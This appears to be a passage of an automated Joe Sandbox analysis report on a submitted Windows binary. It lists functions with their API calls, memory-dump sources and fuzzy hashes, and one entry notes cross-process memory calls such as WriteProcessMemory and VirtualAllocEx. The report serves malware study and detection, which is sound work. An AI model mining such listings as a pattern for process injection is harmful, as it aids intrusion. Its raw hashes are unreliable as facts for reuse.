Instruction Fuzzy Hash: B501D4766022957F23211ABB6CCCE7F6DEDEEC7BA131501A9FD05D7211EB619D0281B0

Function 00BC9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC9693
SelectObject.GDI32(?,00000000), ref: 00BC96A2
BeginPath.GDI32(?), ref: 00BC96B9
SelectObject.GDI32(?,00000000), ref: 00BC96E2

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ec620fc9abdba244d1ca1c7bf9c14316e586ff4a4e7931e4e730fc97351ae1b2
Instruction ID: b2fe6768cccc035fdb4153cd3b5151dd2ff53ae689a030326bfdaf8f31399ff1
Opcode Fuzzy Hash: ec620fc9abdba244d1ca1c7bf9c14316e586ff4a4e7931e4e730fc97351ae1b2
Instruction Fuzzy Hash: 0A215030802305EBEB119F64EC58BAD7BFCFB51755F14426AF810A61F0D3709992CB98

Function 00C15711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00C15726
_memcmp.LIBVCRUNTIME ref: 00C15744
_memcmp.LIBVCRUNTIME ref: 00C15757
_memcmp.LIBVCRUNTIME ref: 00C1576F
_memcmp.LIBVCRUNTIME ref: 00C15787

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 98012af643da1d539f2c69ecd03b2df4a637c7b9dd88a734eafc57f5e955399e
Instruction ID: 8678b33475ed51ea41242cf0b7806a7ed779fcec69aabad888f8ec7be53b55c3
Opcode Fuzzy Hash: 98012af643da1d539f2c69ecd03b2df4a637c7b9dd88a734eafc57f5e955399e
Instruction Fuzzy Hash: CF01F5A5651609FBE21855159D83FFBB38CEBA23A4F004035FD049A2C2F720EE9192E4

Function 00BE2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BDF2DE,00BE3863,00C81444,?,00BCFDF5,?,?,00BBA976,00000010,00C81440,00BB13FC,?,00BB13C6), ref: 00BE2DFD
_free.LIBCMT ref: 00BE2E32
_free.LIBCMT ref: 00BE2E59
SetLastError.KERNEL32(00000000,00BB1129), ref: 00BE2E66
SetLastError.KERNEL32(00000000,00BB1129), ref: 00BE2E6F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: b61e0b989f4cf824cd7d9bedd7f309a4e4ed12932aafc7c4be648bda85034c42
Instruction ID: a9cf5618e66276590d3d7cf8c72ce2674e4083bde5be09093af2adf693d1175d
Opcode Fuzzy Hash: b61e0b989f4cf824cd7d9bedd7f309a4e4ed12932aafc7c4be648bda85034c42
Instruction Fuzzy Hash: F701F43660669067C6122B776CCAF6F26DDEBC27A5B3141B8F425A32A3EB248C014120

Function 00C1000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?,?,00C1035E), ref: 00C1002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?), ref: 00C10046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?), ref: 00C10054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?), ref: 00C10064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C0FF41,80070057,?,?), ref: 00C10070

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: e39de49507b3a85d2f0a187eba51ce4f12a3c697a79d86fdb63d34d2cf60f938
Instruction ID: b270c64450c6f55f5806ba2a27d8bb5a65ff15d48b26794c628ac658263e9713
Opcode Fuzzy Hash: e39de49507b3a85d2f0a187eba51ce4f12a3c697a79d86fdb63d34d2cf60f938
Instruction Fuzzy Hash: 51018476601204BFDB504F65DC44BEE7BADEB49752F244114F905D2220E7B5DEC09760

Function 00C1E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00C1E997
QueryPerformanceFrequency.KERNEL32(?), ref: 00C1E9A5
Sleep.KERNEL32(00000000), ref: 00C1E9AD
QueryPerformanceCounter.KERNEL32(?), ref: 00C1E9B7
Sleep.KERNEL32 ref: 00C1E9F3

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: a76a19058438561155bf33b77a2617c8678542f06b33405acf70d89fc7c90836
Instruction ID: 071452f8a3a3bb108fbb5c4fc16ef72753f5f17926d27401b344a14a8d9a8c4e
Opcode Fuzzy Hash: a76a19058438561155bf33b77a2617c8678542f06b33405acf70d89fc7c90836
Instruction Fuzzy Hash: 31015B35C0252DDBCF40ABE5D889BEDBB78BB0A701F000586E912F2260DB3096959761

Function 00C110F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11114
GetLastError.KERNEL32(?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C1112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C10B9B,?,?,?), ref: 00C11136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C1114D

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: eadc1598150e1a218485b2ea1b919a8ca0f3caf64a4f0900de093c5a653ffe83
Instruction ID: ea80d1f53ad96b5193aacc11d932619131266916e00cc55d149911de01c22980
Opcode Fuzzy Hash: eadc1598150e1a218485b2ea1b919a8ca0f3caf64a4f0900de093c5a653ffe83
Instruction Fuzzy Hash: 6D016979602205BFDB514FA5DC89BAE3B6EFF8B3A4B240418FA41C3360DA31DD409A60

Function 00C10FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C10FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C10FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C10FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C10FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C11002

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a4368d8ae7dfe92f75c9d1d63e1123bc39e51144da90ca4a3d28fbc055679aa0
Instruction ID: 48e3a6b0cb853418f4e632dea90f3e1f791def507a9784503e0890d8b5c24486
Opcode Fuzzy Hash: a4368d8ae7dfe92f75c9d1d63e1123bc39e51144da90ca4a3d28fbc055679aa0
Instruction Fuzzy Hash: 89F04939602301AFDB214FA49C89F9A3BADFF8A7A2F144414FA45C6261CA74DC908A60

Function 00C11014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C1102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C11036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C11062

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: ac14b4bfcf6fb1345d677ba403e2059fc2c9f2cdd82d98da9fd679091d7749b4
Instruction ID: baced1b4745af1af8b3ce68efd8872c2b00226320457ca378a9aa262edc6fccf
Opcode Fuzzy Hash: ac14b4bfcf6fb1345d677ba403e2059fc2c9f2cdd82d98da9fd679091d7749b4
Instruction Fuzzy Hash: 14F06D39602301EBDB215FA5EC89F9A3BADFF8B761F140414FE45C7260CA74D991CA60

Function 00C2030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C20324
CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C20331
CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C2033E
CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C2034B
CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C20358
CloseHandle.KERNEL32(?,?,?,?,00C2017D,?,00C232FC,?,00000001,00BF2592,?), ref: 00C20365

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f6dc0ad8f1148967a329948b02f2b5ea9bb7244805e1be4c18c41fd962d20eb3
Instruction ID: dcf0580ffd1d813f91f686de102f8775da93a0c8a9c54b21d3fef49f6eaa42d2
Opcode Fuzzy Hash: f6dc0ad8f1148967a329948b02f2b5ea9bb7244805e1be4c18c41fd962d20eb3
Instruction Fuzzy Hash: 1401A272801B259FC7309F66E880416FBF5BF503153258A3FD1A652932C3B1AA54CF80

Function 00BED73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BED752

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BED764
_free.LIBCMT ref: 00BED776
_free.LIBCMT ref: 00BED788
_free.LIBCMT ref: 00BED79A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3edd93d844d922d7e39f876977f73d274d6a7194c4cbdd70c12051c62cf3c1fa
Instruction ID: c526c60e561e9cd7cce40fd8898032fe2277cb786323a328542a81ee6c4a0eeb
Opcode Fuzzy Hash: 3edd93d844d922d7e39f876977f73d274d6a7194c4cbdd70c12051c62cf3c1fa
Instruction Fuzzy Hash: 41F06232500289ABC721EB66F9C2E1A77DDFB04310B951899F058E7642CB78FC808660

Function 00C15C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C15C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C15C6F
MessageBeep.USER32(00000000), ref: 00C15C87
KillTimer.USER32(?,0000040A), ref: 00C15CA3
EndDialog.USER32(?,00000001), ref: 00C15CBD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: c26ca153f8931fead4bd2eda6087fa55a17dd1d4305bc3f60e3a20212c4a43ca
Instruction ID: cc6d89243dd7f55f092c19568b8e63f9fb4494b9dad870dd323606ee8feb9865
Opcode Fuzzy Hash: c26ca153f8931fead4bd2eda6087fa55a17dd1d4305bc3f60e3a20212c4a43ca
Instruction Fuzzy Hash: 93018134501B04EBEB205F10DD9EFEA77B8BB46B05F010559B693A10F1DBF4AA949A90

Function 00BE22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE22BE

Part of subcall function 00BE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000), ref: 00BE29DE
Part of subcall function 00BE29C8: GetLastError.KERNEL32(00000000,?,00BED7D1,00000000,00000000,00000000,00000000,?,00BED7F8,00000000,00000007,00000000,?,00BEDBF5,00000000,00000000), ref: 00BE29F0

_free.LIBCMT ref: 00BE22D0
_free.LIBCMT ref: 00BE22E3
_free.LIBCMT ref: 00BE22F4
_free.LIBCMT ref: 00BE2305

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98590cf3704eb205d03ea5d284818367780ebec6f94db8c0654f327a34b1a635
Instruction ID: ba6eaebb3d1c59de752baeb29db261f5856a4471801d7703264178a7658cd99e
Opcode Fuzzy Hash: 98590cf3704eb205d03ea5d284818367780ebec6f94db8c0654f327a34b1a635
Instruction Fuzzy Hash: 3AF054754001558B8722AF95BC42B0C3BECF718760B15555AF514DA3B2C73C04529FE9

Function 00BC95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BC95D4
StrokeAndFillPath.GDI32(?,?,00C071F7,00000000,?,?,?), ref: 00BC95F0
SelectObject.GDI32(?,00000000), ref: 00BC9603
DeleteObject.GDI32 ref: 00BC9616
StrokePath.GDI32(?), ref: 00BC9631

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 2011e164de1fbd9e30d84c293d5cb84b709275d1b1320725a22863a176d6a4db
Instruction ID: 799ea648effcbd359d8b1f89c1c81316dea1931412a0f1c21c30f9ab43c38d51
Opcode Fuzzy Hash: 2011e164de1fbd9e30d84c293d5cb84b709275d1b1320725a22863a176d6a4db
Instruction Fuzzy Hash: 85F0EC35006704EBEB665F65ED5CB6C3BE9FB12322F088268F865550F0D7348996DF28

Function 00BE0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00BE10F9
__freea.LIBCMT ref: 00BE1117

Part of subcall function 00BE1537: _free.LIBCMT ref: 00BE154F

Strings

a/p, xrefs: 00BE11DE
am/pm, xrefs: 00BE117A

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: f5f79bb7c7d63f9d8d5d3bff949ec2c5f81a43927070c94842727f943229934d
Instruction ID: d390c44fd1d8141ab17eca1a7d858cdd6e0bd445f24d1c83e71eae9efcd8067e
Opcode Fuzzy Hash: f5f79bb7c7d63f9d8d5d3bff949ec2c5f81a43927070c94842727f943229934d
Instruction Fuzzy Hash: 99D1F371900286EACB249F6EC895BFEB7F0EF05700F344AD9E601AB651D3759D80CBA5

Function 00C37B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0242: EnterCriticalSection.KERNEL32(00C8070C,00C81884,?,?,00BC198B,00C82518,?,?,?,00BB12F9,00000000), ref: 00BD024D
Part of subcall function 00BD0242: LeaveCriticalSection.KERNEL32(00C8070C,?,00BC198B,00C82518,?,?,?,00BB12F9,00000000), ref: 00BD028A

Part of subcall function 00BB9CB3: _wcslen.LIBCMT ref: 00BB9CBD

Part of subcall function 00BD00A3: __onexit.LIBCMT ref: 00BD00A9

__Init_thread_footer.LIBCMT ref: 00C37BFB

Part of subcall function 00BD01F8: EnterCriticalSection.KERNEL32(00C8070C,?,?,00BC8747,00C82514), ref: 00BD0202
Part of subcall function 00BD01F8: LeaveCriticalSection.KERNEL32(00C8070C,?,00BC8747,00C82514), ref: 00BD0235

Strings

Variable must be of type 'Object'., xrefs: 00C37C3A
5, xrefs: 00C37C78
G, xrefs: 00C37C7F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: cee50c9fb9e3af41237c68052514560637fed36ba255b5a933fc478487437094
Instruction ID: 09ddc6c33a70f95a1d2dd2f221c3a3925950958ea60361ee421f6b53efdb447f
Opcode Fuzzy Hash: cee50c9fb9e3af41237c68052514560637fed36ba255b5a933fc478487437094
Instruction Fuzzy Hash: E2919DB0A14209EFCB24EF54D895DBDB7B1FF45304F108199F816AB2A2DB71AE41DB50

Function 00C12716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C121D0,?,?,00000034,00000800,?,00000034), ref: 00C1B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C12760

Part of subcall function 00C1B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00C1B3F8

Part of subcall function 00C1B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00C1B355
Part of subcall function 00C1B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C12194,00000034,?,?,00001004,00000000,00000000), ref: 00C1B365
Part of subcall function 00C1B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C12194,00000034,?,?,00001004,00000000,00000000), ref: 00C1B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C127CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C1281A

Strings

@, xrefs: 00C12832

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
